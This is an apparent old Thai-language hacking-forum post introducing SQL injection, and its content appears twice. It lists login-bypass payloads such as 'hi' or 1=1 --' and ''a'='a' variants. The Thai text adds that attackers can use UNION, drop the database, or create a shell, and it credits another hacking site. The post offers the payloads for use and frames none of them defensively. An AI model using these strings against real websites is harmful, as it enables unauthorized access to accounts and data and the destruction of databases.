snoar
05-08-2007, 06:37 PM
SQL Injection Ver. 1.00 Beta
**Hidden Content: Check the thread to see hidden data.**hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a
หรือถ้าคนที่ทำเว็บบ่อย จะเชี่ยว MySQL ครับ เราอาจจะใช้ UNION ก็ได้ครับ
หรืออาจจะ Drop ฐานข้อมูลไปเลย หรือถ้า Advance กว่านั้น
เราสามารถสร้าง Shell ขึ้นมาได้เลยครับ แต่ผมขอไม่พูดถึง เพราะรู้สึกจะผิดประเด็น (555)
วันนี้กะแค่มาปฐมนิเทศน์การ SQL Injection ให้พอรู้กันไว้ครับ
เครดิสจาก blackbookz.net
**Hidden Content: Check the thread to see hidden data.**hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a
หรือถ้าคนที่ทำเว็บบ่อย จะเชี่ยว MySQL ครับ เราอาจจะใช้ UNION ก็ได้ครับ
หรืออาจจะ Drop ฐานข้อมูลไปเลย หรือถ้า Advance กว่านั้น
เราสามารถสร้าง Shell ขึ้นมาได้เลยครับ แต่ผมขอไม่พูดถึง เพราะรู้สึกจะผิดประเด็น (555)
วันนี้กะแค่มาปฐมนิเทศน์การ SQL Injection ให้พอรู้กันไว้ครับ
เครดิสจาก blackbookz.net